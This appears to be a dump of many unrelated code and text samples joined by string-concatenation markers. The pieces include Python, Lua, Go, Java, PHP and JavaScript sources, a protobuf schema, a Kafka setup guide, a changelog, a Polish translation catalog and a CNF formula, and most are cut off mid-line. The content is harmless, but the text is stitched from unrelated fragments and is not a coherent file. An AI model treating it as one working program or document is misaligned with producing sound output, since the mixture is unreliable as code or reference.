can't be found.\n\nTo fix this, we'll copy the required file into our Google Drive account.\n\n1. Log into Google Drive.\n2. In Google Drive, make a folder named **data**, with a subfolder named\n **cornell**.\n3. Visit the Cornell Movie Dialogs Corpus and download the ZIP file.\n4. Unzip the file on your local machine.\n5. Copy the file **movie\\_lines.txt**" +"'''\nCreated on April 14, 2011\n\n@author: Mark V Systems Limited\n(c) Copyright 2011 Mark V Systems Limited, All rights reserved.\n'''\ntry:\n import regex as re\nexcept ImportError:\n import re\n\ndef attrValue(str, name):\n # retrieves attribute in a string, such as xyz=\"abc\" or xyz='abc' or xyz=abc; \n prestuff, matchedName, valuePart = str.lower().partition(\"charset\")\n value = []\n endSep = None\n beforeEquals = True\n for c in valuePart:\n if value:\n if c == endSep or c.isspace() or c in (';'):\n break\n value.append(c)\n elif beforeEquals:\n if c == '=':\n beforeEquals = False\n else:\n if c in ('\"', \"'\"):\n endSep = c\n elif c == ';':\n break\n elif not c.isspace():\n value.append(c)\n return ''.join(value)" +"syntax = \"proto3\";\npackage turbo;\n\nmessage TestPrimitives {\n\tint64 Int64Value = 1;\n\tsint32 Int32Value = 2;\n\tuint64 Uint64Value = 3;\n\tuint32 Uint32Value = 4;\n\tfloat Float32Value = 5;\n\tdouble Float64Value = 6;\n\tbool BoolValue = 7;\n}\n\nmessage TestProtoStruct {\n\tint64 Value = 1;\n}\n\nmessage TestTags {\n\tTestTagsData Data = 1;\n}\n\nmessage TestTagsData {\n\tstring UploadFile = 1;\n\tstring UploadUrl = 2;\n\tstring MetadataOnly = 3;\n\tint64 ContentTypeId = 4;\n\tint64 CreativeApiId = 5;\n\tsint32 Duration = 6;\n\tfloat PhysicalDuration = 7;\n\tsint32 Bitrate = 8;\n\tsint32 Height = 9;\n\tsint32 Width = 10;\n\tfloat Fps = 11;\n\tstring Id3Tag = 12;\n}" +"Chapter 2: Merging\n==================\n\n**Standard merge sort**\n\nMerge sorting works by breaking an array into two halves, over and over again,\nuntil the size of each half is below some threshold. For a threshold of 2 this\nmeans simply swapping the two items in that part of the array if they are out\nof order. For a larger threshold you could use an insertion sort or something.\nOnce we have sorted two halves of the array, we have to *merge* them together\nto arrive at the final sorted array.\n\n MergeSort(array, range)\n if (range.length == 2)\n if (array[range.start] > array[range.end]) Swap(array[range.start], array[range.end])\n else if (range.length > 2)\n mid = range.start + range.length/2\n MergeSort(array, MakeRange(range.start, mid))\n MergeSort(array, MakeRange(mid, range.end))\n\n Merge(array, MakeRange(range.start, mid), MakeRange(mid, range.end))\n\n* * *\n\n**Standard merge**\n\nThe merge operation of the merge sort algorithm takes two arrays that *are\nalready sorted* (either from swapping or insertion sorting, as mentioned above),\nand combines them into a single array containing A and B sorted together.\nThe operation is acutally quite simple: just take the smaller of the two values\nat the start of A and B and add it to the final array. Once A and B are empty,\nthe final" +"{% comment %}\nLoops through all reviewer, translator, and translation editor data to create an acknowledgement sentence. This is used both on project-team.md as well as es/equipo-de-proyecto.md\n{% endcomment %}\n\n{% assign alllessons = site.pages | where: \"lesson\" , \"true\" %}\n\n{% assign reviewers = alllessons | map: \"reviewers\" %}\n{% assign editors = alllessons | map: \"editors\" %}\n{% assign translators = alllessons | map: \"translator\" %}\n{% assign translation_editors = alllessons | map: \"translation-editors\" %}\n{% assign translation_reviewers = alllessons | map: \"translation-reviewer\" %}\n\n{% assign allpersons = reviewers | concat: editors | concat: translators | concat: translation_editors | concat: translation_reviewers %}\n\n{% assign contributors = allpersons | compact | uniq %}\n\n{{ contributors | join: \", \" }}," +"local Event = require 'utils.event'\nlocal Token = require 'utils.token'\nlocal Task = require 'utils.task'\nlocal Global = require 'utils.global'\nlocal Command = require 'utils.command'\nlocal Debug = require 'utils.debug'\nlocal Gui = require 'utils.gui'\n\nlocal set_timeout_in_ticks = Task.set_timeout_in_ticks\nlocal debug_print = Debug.print\n\nlocal skip_btn_name = Gui.uid_name()\nlocal backward_btn_name = Gui.uid_name()\nlocal forward_btn_name = Gui.uid_name()\n\nlocal Public = {}\nlocal handler\n\nlocal cutscene_functions = {}\nlocal running_cutscenes = {}\nlocal replay = {\n identifier = nil,\n final_transition_time = nil\n}\nGlobal.register(\n {\n cutscene_functions = cutscene_functions,\n running_cutscenes = running_cutscenes,\n replay = replay\n },\n function(tbl)\n cutscene_functions = tbl.cutscene_functions\n running_cutscenes = tbl.running_cutscenes\n replay = tbl.replay\n end\n)\n\nlocal function valid(entity)\n return entity and entity.valid\nend\n\nlocal function waypoint_still_active(tick, player_index)\n local running_cutscene = running_cutscenes[player_index]\n tick = tick or -1\n if tick == -1 then\n debug_print('Tick was nil', 5)\n end\n if not running_cutscene or tick < running_cutscene.start_tick then\n return false\n end\n return true\nend\n\nlocal toggle_gui_delayed =\n Token.register(\n function(params)\n local player = params.player\n if (not valid(player)) then\n return\n end\n if not waypoint_still_active(params.tick, player.index) then\n debug_print('Cutscene is no longer active. Skipping toggle_gui')\n return\n end\n local event = {player = player}\n local clear = params.clear\n if clear == 'left' then\n player.gui.left.clear()\n elseif clear == 'top' then\n player.gui.top.clear()" +"// namespaces\nvar dwv = dwv || {};\ndwv.io = dwv.io || {};\n\n/**\n * DICOM data loader.\n * @constructor\n */\ndwv.io.DicomDataLoader = function ()\n{\n // closure to self\n var self = this;\n\n /**\n * Loader options.\n * @private\n * @type Object\n */\n var options = {};\n\n /**\n * Loading flag.\n * @private\n * @type Boolean\n */\n var isLoading = false;\n\n /**\n * Set the loader options.\n * @param {Object} opt The input options.\n */\n this.setOptions = function (opt) {\n options = opt;\n };\n\n /**\n * Is the load ongoing?\n * @return {Boolean} True if loading.\n */\n this.isLoading = function () {\n return isLoading;\n };\n\n /**\n * DICOM buffer to dwv.image.View (asynchronous)\n * @private\n */\n var db2v = new dwv.image.DicomBufferToView();\n\n /**\n * Load data.\n * @param {Object} buffer The DICOM buffer.\n * @param {String} origin The data origin.\n * @param {Number} index The data index.\n */\n this.load = function (buffer, origin, index) {\n // setup db2v ony once\n if (!isLoading) {\n // set character set\n if (typeof options.defaultCharacterSet !== \"undefined\") {\n db2v.setDefaultCharacterSet(options.defaultCharacterSet);\n }\n // connect handlers\n db2v.onloadstart = self.onloadstart;\n db2v.onprogress = self.onprogress;\n db2v.onloaditem = self.onloaditem;\n db2v.onload = self.onload;\n db2v.onloadend = function (event) {\n // reset loading flag\n isLoading =" +"/**\n * Copyright (c) 2017 ~ present NAVER Corp.\n * billboard.js project is licensed under the MIT license\n */\n/**\n * Axis based chart data config options\n */\nexport default {\n\t/**\n\t * Specify the key of x values in the data.<br><br>\n\t * We can show the data with non-index x values by this option. This option is required when the type of x axis is timeseries. If this option is set on category axis, the values of the data on the key will be used for category names.\n\t * @name data\u2024x\n\t * @memberof Options\n\t * @type {string}\n\t * @default undefined\n\t * @example\n\t * data: {\n\t * x: \"date\"\n\t * }\n\t */\n\tdata_x: <string|undefined> undefined,\n\n\t/**\n\t * Specify the keys of the x values for each data.<br><br>\n\t * This option can be used if we want to show the data that has different x values.\n\t * @name data\u2024xs\n\t * @memberof Options\n\t * @type {object}\n\t * @default {}\n\t * @example\n\t * data: {\n\t * xs: {\n\t * data1: \"x1\",\n\t * data2: \"x2\"\n\t * }\n\t * }\n\t */\n\tdata_xs: {},\n\n\t/**\n\t * Set a format specifier to parse string specifed as x.\n\t * @name data\u2024xFormat\n\t * @memberof Options\n\t * @type {string}\n\t *" +"// this cannot be located at source/brower.ts as otherwise it would become the browser entry\n\n// Imports\nimport { Transform } from '../transform.js'\n\n/** Mapping of ANSI color codes into a CSS style */\nexport interface Styles {\n\t[key: string]: {\n\t\t/** The ANSI color code used to start the style */\n\t\tstart: string\n\t\t/** The ANSI color code used to end the style */\n\t\tend: string\n\t\t/** The CSS style value */\n\t\tvalue: string\n\t}\n}\n\n/** Configuration optons for the Caterpillar Browser Transform */\nexport interface BrowserOptions {\n\t/** Use to override the default value of {@link Filter.color} */\n\tcolor?: boolean\n\t/** Use to override the default value of {@link Filter.console} */\n\toutput?: boolean\n\t/** Use to override the default value of {@link Filter.styles} */\n\tstyles?: Styles\n}\n\n/**\n * Convert human readable Caterpillar entries into browser compatible entries.\n * @example\n * ``` javascript\n * import { Logger, Human, Browser } from 'caterpillar'\n * const logger = new Logger()\n * logger.pipe(new Human()).pipe(new Browser())\n * logger.log('info', 'some', {data: 'oh yeah'}, 42)\n * ```\n */\nexport class Browser extends Transform {\n\t/** Whether or not we should use color. */\n\tpublic color: boolean = true\n\n\t/** Whether or not we" +"\n//# Pipeline Merge (One-Hot Selector)\n\n// Takes in multiple input ready/valid handshakes with associated data, and\n// merges them one at a time into a single output ready/valid handshake. An\n// input is merged when selected by a one-hot bit vector. (Use [Binary to\n// One-Hot](./Binary_to_One_Hot.html) if necessary.)\n\n//## Interleaving\n\n// Normally, the `selector` remains stable while input transfers are in\n// progress (input ready and valid both high), but if you are careful you can\n// change the selector each cycle to interleave data from multiple inputs\n// transfers into the output transfer.\n\n//## Multiple selected inputs\n\n// Normally, only one bit of the one-hot `selector` must be set at any time.\n// If no bit is set, then the inputs and the output are all disconnected and\n// no handshake can complete. If more than one bit is set, then the multiple\n// selected inputs are combined so that the output receives the OR-reduction\n// of the selected input valids, and the OR-reduction of the selected input\n// data. This behaviour might be usable *if you can guarantee that only one\n// input is active at any given moment*, resulting in a non-synchronizing\n// [Pipeline Join](./Pipeline_Join.html).\n\n// The" +"Changes in Traitlets\n====================\n\nTraitlets 5.0\n-------------\n\n5.0.4\n*****\n\n- Support deprecated use of byte-literals for bytes on the command-line: ``ipython kernel --Session.key=\"b'abc'\"``. The `b` prefix is no longer needed in traitlets 5.0, but is supported for backward-compatibility\n- Improve output of configuration errors, especially when help output would make it hard to find the helpful error message\n\n5.0.3\n*****\n\n- Fix regression in handling `--opt=None` on the CLI for configurable traits\n with `allow_none=True`\n\n5.0.2\n*****\n\n- Fix casting bytes to unicode\n\n5.0.0\n*****\n\n\n(This is an in-progress changelog, please let us know if something is missing/or could be phrased better)\n\nTraitlets 5.0 is a new version of traitlets that accumulate changes over a period of more close to four years; A number of\ninternal refactoring made the internal code structure cleaner and simpler, and greatly improved the diagnostic error\nmessages as well has help and documentation generation.\n\nWe expect no code change needed for any consumer of the Python API (ipywidgets, and alike),\nthough CLI argument parsing have seen a complete rewrite,\nso if you have an application that does use the parsing logic of traitlets you may see changes in behavior,\nand now have access to more features." +"<h4>Description</h4>\n<p>\nSite administrators have the option of providing a comments section for users. Comments can be added to many modules and displayed in a variety of ways. Comments can be screened, filtered, and made available to selected groups. This provides quick easy interaction from site users, while maintaining good moderation and security.<br /><br />\n\nThe Comment Manager allows the Site administrator to edit and delete any comment that has been posted to the site, originating in any module that supports the comments feature.\nLike the Blocks Administration page, some filters options are available to help the site administrator manage the comments. <br /><br />\n\nYou can also select several comments and delete them at once.\n\n</p>" +"/* Copyright (c) Microsoft Corporation. All rights reserved. */\n\n#include \"sll.h\"\n\n\ntypedef struct _LIST_ENTRY {\n struct _LIST_ENTRY *Flink;\n struct _LIST_ENTRY *Blink;\n} LIST_ENTRY, *PLIST_ENTRY;\n\nPLIST_ENTRY create(int length) {\n/* int i; */\n PLIST_ENTRY head, tmp;\n\n head = NULL;\n/* for(i = 0; i < length; i++) { */\n tmp = (PLIST_ENTRY)malloc(sizeof(LIST_ENTRY));\n tmp->Flink = head;\n head = tmp;\n/* } */\n return head;\n}\n\nvoid traverse(PLIST_ENTRY head) {\n PLIST_ENTRY tmp = head;\n\n while(tmp != NULL) {\n tmp = tmp->Flink ;\n }\n}\n\nvoid destroy(PLIST_ENTRY head) {\n PLIST_ENTRY t, c = head;\n\n/* while(c != NULL) { */\n t = c;\n c = c->Flink;\n free(t);\n}\n\nvoid main(void) {\n int length = 10;\n PLIST_ENTRY head;\n head = create(length);\n traverse(head);\n destroy(head);\n return;\n}" +"## Setting up a local instance of Kafka\n\nUse https://github.com/wurstmeister/kafka-docker\n\n\n```\nmkdir kafka-docker\ncd kafka-docker\ngit clone https://github.com/wurstmeister/kafka-docker .\n```\n<!-- disable-secrets-detection-start -->\n* Edit file `docker-compose-single-broker.yml`\n* Change KAFKA_ADVERTISED_HOST_NAME to your machine's IP. Use `ifconfig | grep 'inet '` to see available ips. It is recommended to use an IP which doesn't change. Otherwise you will need to bring up again the cluster every time the ip changes. You can use the IP of global protect interface: gpd0. On my machine it has a value of: `10.196.100.168`.\n* Start a Kafka cluster:\n```\ndocker-compose -f docker-compose-single-broker.yml up\n```\n\nThis will startup a kafka with a default topic named `test`.\n\n## Configure an integration instance\n* For the broker, set your machine IP address, the one set as KAFKA_ADVERTISED_HOST_NAME in the previous step, with addition of the port `9092`, e.g. `10.196.100.168:9092`.\n\n## Creating Additional Topics for Testing \nIn the `kafka-docker` dir run the following to start a shell:\n```\n./start-kafka-shell.sh host.docker.internal host.docker.internal:2181\n```\nIn the shell run:\n* Create topic with 4 partitions: `$KAFKA_HOME/bin/kafka-topics.sh --zookeeper $ZK --create --topic mytest-topic --partitions 4 --replication-factor 1`\n* Create topic with lz4 compression: `$KAFKA_HOME/bin/kafka-topics.sh --zookeeper $ZK --create --topic test-lz4 --replication-factor 1 --config compression.type=lz4 --partitions" +"<?php\n\nnamespace Mongofill\\Benchmarks;\n\nclass InsertingEvent extends AthleticEvent\n{\n /**\n * @iterations 1000\n */\n public function simpleDocument()\n {\n $record = $this->buildSimpleDocument();\n $r = $this->getTestDB()->test->insert($record, ['w' => 1]);\n\n if ($r['ok'] != 1) {\n throw new \\Exception('Non ok result at simpleDocumentW0'. json_encode($r));\n }\n }\n\n /**\n * @iterations 1000\n */\n public function simpleDocumentW0()\n {\n $record = $this->buildSimpleDocument();\n $r = $this->getTestDB()->test->insert($record, ['w' => 0]);\n\n if ($r !== true) {\n throw new \\Exception('Non true result at simpleDocumentW0');\n }\n }\n\n /**\n * @iterations 1000\n */\n public function simpleNestedDocument()\n {\n $record = $this->buildSimpleNestedDocument();\n $this->getTestDB()->test->insert($record);\n }\n\n /**\n * @iterations 1000\n */\n public function complexDocument()\n {\n $record = $this->buildComplexDocument();\n $this->getTestDB()->test->insert($record);\n }\n\n /**\n * @iterations 1000\n */\n public function complexNestedDocument()\n {\n $record = $this->buildComplexNestedDocument();\n $this->getTestDB()->test->insert($record);\n }\n}" +"import torch\nimport zmq\nimport flatbuffers\nfrom termcolor import colored\n\nfrom . import util, state, __version__\nfrom .distributions import Uniform, Normal, Categorical, Poisson, Bernoulli, Beta, Exponential, Gamma, LogNormal, Binomial, Weibull\nfrom .ppx import Message as ppx_Message\nfrom .ppx import MessageBody as ppx_MessageBody\nfrom .ppx import Tensor as ppx_Tensor\nfrom .ppx import Distribution as ppx_Distribution\nfrom .ppx import Uniform as ppx_Uniform\nfrom .ppx import Normal as ppx_Normal\nfrom .ppx import Categorical as ppx_Categorical\nfrom .ppx import Poisson as ppx_Poisson\nfrom .ppx import Bernoulli as ppx_Bernoulli\nfrom .ppx import Beta as ppx_Beta\nfrom .ppx import Exponential as ppx_Exponential\nfrom .ppx import Gamma as ppx_Gamma\nfrom .ppx import LogNormal as ppx_LogNormal\nfrom .ppx import Binomial as ppx_Binomial\nfrom .ppx import Weibull as ppx_Weibull\nfrom .ppx import Handshake as ppx_Handshake\nfrom .ppx import HandshakeResult as ppx_HandshakeResult\nfrom .ppx import Run as ppx_Run\nfrom .ppx import RunResult as ppx_RunResult\nfrom .ppx import Sample as ppx_Sample\nfrom .ppx import SampleResult as ppx_SampleResult\nfrom .ppx import Observe as ppx_Observe\nfrom .ppx import ObserveResult as ppx_ObserveResult\nfrom .ppx import Tag as ppx_Tag\nfrom .ppx import TagResult as ppx_TagResult\nfrom .ppx import Reset as ppx_Reset\n\n\nclass ZMQRequester():\n def __init__(self, server_address):\n self._server_address = server_address\n self._context = zmq.Context.instance()\n self._socket = self._context.socket(zmq.REQ)" +"# edit the \"button =\" part for each entry according to your remote, and stick\n# this stuff in ~/.lircrc\n\nbegin\n\tprog = Rhythmbox\n\tremote = *\n\tbutton = KEY_PLAY\n\trepeat = 1\n\tconfig = play\nend\n\nbegin\n\tprog = Rhythmbox\n\tremote = *\n\tbutton = KEY_PAUSE\n\trepeat = 0\n\tconfig = pause\nend\n\nbegin\n\tprog = Rhythmbox\n\tremote = *\n\tbutton = KEY_PLAYPAUSE\n\trepeat = 1\n\tconfig = playpause\nend\n\nbegin\n\tprog = Rhythmbox\n\tremote = *\n\tbutton = KEY_STOP\n\trepeat = 1\n\tconfig = stop\nend\n\n#FIXME\n#begin\n#\tprog = Rhythmbox\n#\tremote = *\n#\tbutton = \n#\trepeat = 1\n#\tconfig = shuffle\n#end\n\n#FIXME\n#begin\n#\tprog = Rhythmbox\n#\tremote = *\n#\tbutton = \n#\trepeat = 1\n#\tconfig = repeat\n#end\n\nbegin\n\tprog = Rhythmbox\n\tremote = *\n\tbutton = KEY_NEXT\n\trepeat = 1\n\tconfig = next\nend\n\nbegin\n\tprog = Rhythmbox\n\tremote = *\n\tbutton = KEY_PREVIOUS\n\trepeat = 1\n\tconfig = previous\nend\n\nbegin\n\tprog = Rhythmbox\n\tremote = *\n\tbutton = KEY_FASTFORWARD\n\trepeat = 1\n\tconfig = seek_forward\nend\n\nbegin\n\tprog = Rhythmbox\n\tremote = *\n\tbutton = KEY_REWIND\n\trepeat = 1\n\tconfig = seek_backward\nend" +"# ADR 0026 - Post-hoc Metrics Scripting\n\n## Context\n\n[ADR 24](./adr-0024-metrics-scripting.md) answered the question of how to\ntrack metrics for events in Raster Foundry servers. It doesn't answer how to\ntrack events for requests elsewhere, for example, total logins by user, or non-events,\nlike storage used for uploads. Since\nwe'd also like metrics from third party services and ongoing usage data in the database\nfor querying and eventual visualization, we need to determine a strategy for either\npushing or regularly importing those events as well.\n\n## Options\n\n### Events\n\n#### Option 1 -- webhooks\n\nIn this option, basically there's no such thing as post-hoc metrics, since\nwe use a hook to send an event to our API whenever something occurs that we're\ninterested in. This strategy seemed like it might be possible for Auth0 logins,\nwhich are where I focused experimentation.\n\nWe can execute almost arbitrary javascript after credential exchange via the\n\"Client Credential Exchange\" hook. This means we could fire off a request to\nincrement the login count for a user as part of the login hook. See the \n`make-bogus-request` hook in the staging tenant for an example of what this looks\nlike, and [Papertrail logs](https://papertrailapp.com/groups/4082183/events?q=minCloudCover%3D9999)\nfor evidence that" +"package hystrix\n\ntype executorPool struct {\n\tName string\n\tMetrics *poolMetrics\n\tMax int\n\tTickets chan *struct{}\n}\n\nconst ConcurrentRequestsLimit = 5000\n\nfunc newExecutorPool(name string) *executorPool {\n\tp := &executorPool{}\n\tp.Name = name\n\tp.Metrics = newPoolMetrics(name)\n\tp.Max = getSettings(name).MaxConcurrentRequests\n\tif p.Max > ConcurrentRequestsLimit {\n\t\tp.Max = ConcurrentRequestsLimit\n\t}\n\n\tp.Tickets = make(chan *struct{}, p.Max)\n\tfor i := 0; i < p.Max; i++ {\n\t\tp.Tickets <- &struct{}{}\n\t}\n\n\treturn p\n}\n\nfunc (p *executorPool) Return(ticket *struct{}) {\n\tif ticket == nil {\n\t\treturn\n\t}\n\n\tp.Metrics.Updates <- poolMetricsUpdate{\n\t\tactiveCount: p.ActiveCount(),\n\t}\n\tp.Tickets <- ticket\n}\n\nfunc (p *executorPool) ActiveCount() int {\n\treturn p.Max - len(p.Tickets)\n}" +"id: dsq-747532430\ndate: 2010-06-09T03:31:09.0000000-07:00\nname: Johan Driessen\navatar: https://disqus.com/api/users/avatars/nahojd.jpg\nmessage: \"<p>I couldn't get the upgrader tool to work at all. Or rather, it ran, but it totally destroyed my blog in the process. I got (at least) 3 serious errors:<br>1. It added a <httpErrors> section in web.config under <system.webServer>, which got me the error message \\\"Config Error: This configuration section cannot be used at this path.\\\"<br>2. It removed my connectionstring. Yep, that's right, totally cleared out the connectionStrings section of web.config<br>3. Once I commented out the <httpErrors> section and put my connection string back, I got the \\\"upgrading\\\" page, but after that i couldn't log in. Not with my admin account, and not with OpenID.<br>So by then I just gave up on upgrading... If it helps, I'm currently running 2.1.2.2 on Win2K8 R2.<br>Is there some manual way to do the upgrade?</p>\"" +"1\tpolish\tx-vnd.Haiku.TV\t1995288111\nNo menu\tMainWin\t\tBez menu\nNo border\tMainWin\t\tBez ramki\nforce 704 x 576, display aspect 4:3\tMainWin\t\twymu\u015b 704 x 576, proporcje 4:3\nError, connecting to interface failed:\\n\\n\tMainWin\t\tB\u0142\u0105d, nie mo\u017cna pod\u0142\u0105czy\u0107 interfejsu:\\n\\n\nforce 544 x 576, display aspect 4:3\tMainWin\t\twymu\u015b 544 x 576, proporcje 4:3\nFull screen\tMainWin\t\tPe\u0142ny ekran\nScale to native size\tMainWin\t\tZeskaluj do oryginalnego rozmiaru\nunknown\tMainWin\t\tnieznany\nNext channel\tMainWin\t\tNast\u0119pny kana\u0142\nKeep aspect ratio\tMainWin\t\tZachowaj proporcje\nDVB - Digital Video Broadcasting TV\tMainWin\t\tDVB - Digital Video Broadcasting TV\nAlways on top\tMainWin\t\tZawsze na wierzchu\nDebug\tMainWin\t\tDebuguj\nInterface\tMainWin\t\tInterfejs\nforce 720 x 576, display aspect 4:3\tMainWin\t\twymu\u015b 720 x 576, proporcje 4:3\nQuit\tMainWin\t\tZako\u0144cz\nChannel\tMainWin\t\tKana\u0142\nPrevious channel\tMainWin\t\tPoprzedni kana\u0142\nOK\tMainWin\t\tOK\nTV\tMainWin\t\tTelewizja\nSettings\tMainWin\t\tUstawienia\nTV\tSystem name\t\tTV\nSettings\u2026\tMainWin\t\tUstawienia\u2026\nNone\tMainWin\t\tPuste\nError, interface is busy:\\n\\n\tMainWin\t\tB\u0142\u0105d, interfejs zaj\u0119ty:\\n\\n\npixel aspect ratio\tMainWin\t\tproporcje pikseli" +"c This Formular is generated by mcnf\nc\nc horn? no \nc forced? no \nc mixed sat? no \nc clause length = 3 \nc\np cnf 50 218 \n 45 -29 8 0\n-49 17 11 0\n-40 -17 -23 0\n-1 49 20 0\n-10 -18 40 0\n-25 -24 48 0\n44 27 41 0\n-17 -43 30 0\n32 33 11 0\n24 26 42 0\n-33 38 44 0\n-5 14 49 0\n-8 33 -45 0\n49 3 -10 0\n34 -27 2 0\n-45 23 3 0\n10 7 36 0\n-10 36 -5 0\n46 8 42 0\n-38 -19 12 0\n50 37 45 0\n8 -46 12 0\n19 -33 26 0\n11 47 48 0\n3 45 34 0\n21 22 4 0\n-18 -31 8 0\n-1 9 -38 0\n-32 -35 -23 0\n-45 2 -24 0\n-45 36 -17 0\n11 -18 20 0\n23 48 -18 0\n37 -5 26 0\n38 29 -26 0\n8 -1 -27 0\n-14 -9 -45 0\n42 50 39 0\n-1 47 17 0\n-50 43 -29 0\n-17 -11 -36 0\n20 -48 43 0\n-6 -22 -19 0" +"# Description\r\n\r\nThis tool takes a CSV file with basic metadata and expand it into a source file(s) for use in Delphi based on pre-defined templates.\r\n\r\nUsing single and multi-file templates you can make almost any unit or form. Included example includes generating a *mORMot* `TSQLRecord` descendant as well as a CDS-based form for editing a single record/object.\r\n\r\nIt is not intended as a full-fledged RAD tool but rather to generate the bulk of repetitive code so you can copy to your project and edit from there on.\r\n\r\n# Forum Thread\r\n\r\nSee http://synopse.info/forum/viewtopic.php?id=1911\r\n\r\n# Usage\r\n\r\n Create CSV file \r\n\r\ne.g. `SampleObj.csv`:\r\n\r\n Code,RawUTF8,Edit,30\r\n Desc,RawUTF8,Edit,512\r\n ItemType,RawUTF8,ComboBox,30\r\n Cost,Currency,Edit\r\n LastCostD,TDateTime,DateEdit\r\n VatCat,Integer,RadioGroup\r\n Active,Boolean,CheckBox\r\n\r\n# Format\r\n\r\n <Property/Field name>, DataType, Control[, Size]\r\n\r\nSave with `FileName` of class name, e.g. `SampleObj.csv` would create e.g. classes:\r\n\r\n DataSampleObj.pas (class TSQLSampleObj)\r\n SampleObjFormU.pas (Class TSampleObjForm)\r\n SampleObjFormU.dfm\r\n\r\n\r\nWhen creating template, keep in mind the following, there are few magic-cookies that get replaced with your text and some tags.\r\n\r\nSome magic-cookies:\r\n\r\n* MyObj = ClassName, e.g. SampleObj (Determined by filename)\r\n* MyName = property name e.g. BirthDate\r\n* MyType = property type, e.g. `RawUTF8`\r\n* MyField = property CDS Field type `TStringField`\r\n* MyFieldAs = CDS field get/setter str, e.g. `AsString`\r\n* MyControl = If" +"package ratelimiter\n\nimport (\n\t\"time\"\n)\n\n// RateLimiter is a simple rate-limiter for any resources inspired by Cloudflare's approach: https://blog.cloudflare.com/counting-things-a-lot-of-different-things/\ntype RateLimiter struct {\n\tdataStore LimitStore\n\trequestsLimit int64\n\twindowSize time.Duration\n}\n\n// New creates new rate limiter. A dataStore is internal limiter data store, requestsLimit and windowSize are parameters of limiter e.g. requestsLimit: 5 and windowSize: 1*time.Minute means that limiter allows up to 5 requests per minute\nfunc New(dataStore LimitStore, requestsLimit int64, windowSize time.Duration) *RateLimiter {\n\n\treturn &RateLimiter{\n\t\tdataStore: dataStore,\n\t\trequestsLimit: requestsLimit,\n\t\twindowSize: windowSize,\n\t}\n}\n\n// Inc increments limiter counter for a given key or returns error when it's not possible\nfunc (r *RateLimiter) Inc(key string) error {\n\tcurrentWindow := time.Now().UTC().Truncate(r.windowSize)\n\treturn r.dataStore.Inc(key, currentWindow)\n}\n\n// LimitStatus represents current status of limitation for a given key\ntype LimitStatus struct {\n\t// IsLimited is true when a given key should be rate-limited\n\tIsLimited bool\n\t// LimitDuration is not nil when IsLimited is true. It's the time for which a given key should be blocked before CurrentRate falls below declared in constructor requests limit\n\tLimitDuration *time.Duration\n\t// CurrentRate is approximated current requests rate per window size (declared in the constructor)\n\tCurrentRate float64\n}\n\n// Check checks status of rate-limiting for a" +"package com.system.manager.dao.impl;\nimport java.util.List;\n\nimport javax.persistence.EntityManager;\nimport javax.persistence.PersistenceContext;\nimport javax.persistence.Query;\n\nimport org.springframework.beans.factory.annotation.Autowired;\nimport org.springframework.stereotype.Repository;\n\nimport com.system.manager.dao.PhotoDao;\nimport com.system.manager.entity.Photo;\nimport com.system.manager.service.impl.BaseRepository;\nimport com.system.manager.service.impl.EntityRepositoryImpl;\n@Repository\npublic class PhotoDaoImpl extends EntityRepositoryImpl<Photo> implements PhotoDao {\n\t\n\t@PersistenceContext \n\tEntityManager em;\n\t@Autowired\n\tprotected BaseRepository baseRepository;\n\t@Override\n\tprotected Class<Photo> getPersistentClass() {\n\t\treturn Photo.class;\n\t}\n\t@SuppressWarnings(\"unchecked\")\n\t@Override\n\tpublic List<Photo> queryPhotoListByFkId(String themeId) {\n\t\tQuery q=em.createQuery(\"from Photo where pfkid=:fkid order by pid\");\n\t\tq.setParameter(\"fkid\", themeId);\n\t\treturn q.getResultList();\n\t}\n\t@Override\n\tpublic void savePhoto(Photo obj) {\n//\t\tem.persist(p);\n\t\tbaseRepository.save(obj);\n\t}\n\t@Override\n\tpublic void deletePhoto(String pid) {\n\t\tQuery qy=em.createQuery(\"delete from Photo where pfkid=:pfkid\");\n\t\tqy.setParameter(\"pfkid\", pid);\n\t\tqy.executeUpdate();\n\t}\n\t@Override\n\tpublic void save(Photo obj) {\n\t\t// TODO Auto-generated method stub\n\t\t\n\t}\n\t@Override\n\tpublic void update(Photo obj) {\n\t\t// TODO Auto-generated method stub\n\t\t\n\t}\n}" +"/**\n * @jest-environment jsdom\n */\nimport PDFUtils from '../utils';\nimport PDFJS from '../PDFJS';\n\nconst mockDefaultTextLayerFactory = () => {\n let div;\n\n const renderTextLayer = ({ container }) => {\n div = container;\n div.innerText = 'test !';\n return {\n promise: Promise.resolve(),\n };\n };\n\n PDFJS.renderTextLayer = renderTextLayer;\n};\n\ndescribe('PDF utils', () => {\n let pdf;\n\n describe('extractPDFInfo', () => {\n beforeEach(() => {\n pdf = {\n numPages: 2,\n getPage: jest.fn().mockReturnValue(Promise.resolve()),\n };\n spyOn(PDFJS, 'getDocument').and.returnValue({ promise: Promise.resolve(pdf) });\n spyOn(PDFUtils, 'extractPageInfo').and.returnValue(Promise.resolve(55));\n });\n\n it('should return page character count added for all pages', done => {\n PDFUtils.extractPDFInfo('pdfFile').then(pdfInfo => {\n expect(pdfInfo).toEqual({ 1: { chars: 55 }, 2: { chars: 110 } });\n done();\n });\n });\n });\n\n describe('extractPageInfo', () => {\n it('should return number of characters on the page', done => {\n const page = {\n getViewport: jest.fn(),\n getTextContent: jest.fn().mockReturnValue(Promise.resolve({})),\n };\n\n mockDefaultTextLayerFactory();\n\n PDFUtils.extractPageInfo(page).then(chars => {\n expect(chars).toEqual(6);\n done();\n });\n });\n });\n});" +"<?php\nnamespace Elementor;\n\nif ( ! defined( 'ABSPATH' ) ) {\n\texit; // Exit if accessed directly.\n}\n\n/**\n * Elementor rollback.\n *\n * Elementor rollback handler class is responsible for rolling back Elementor to\n * previous version.\n *\n * @since 1.5.0\n */\nclass Rollback {\n\n\t/**\n\t * Package URL.\n\t *\n\t * Holds the package URL.\n\t *\n\t * @since 1.5.0\n\t * @access protected\n\t *\n\t * @var string Package URL.\n\t */\n\tprotected $package_url;\n\n\t/**\n\t * Version.\n\t *\n\t * Holds the version.\n\t *\n\t * @since 1.5.0\n\t * @access protected\n\t *\n\t * @var string Package URL.\n\t */\n\tprotected $version;\n\n\t/**\n\t * Plugin name.\n\t *\n\t * Holds the plugin name.\n\t *\n\t * @since 1.5.0\n\t * @access protected\n\t *\n\t * @var string Plugin name.\n\t */\n\tprotected $plugin_name;\n\n\t/**\n\t * Plugin slug.\n\t *\n\t * Holds the plugin slug.\n\t *\n\t * @since 1.5.0\n\t * @access protected\n\t *\n\t * @var string Plugin slug.\n\t */\n\tprotected $plugin_slug;\n\n\t/**\n\t * Rollback constructor.\n\t *\n\t * Initializing Elementor rollback.\n\t *\n\t * @since 1.5.0\n\t * @access public\n\t 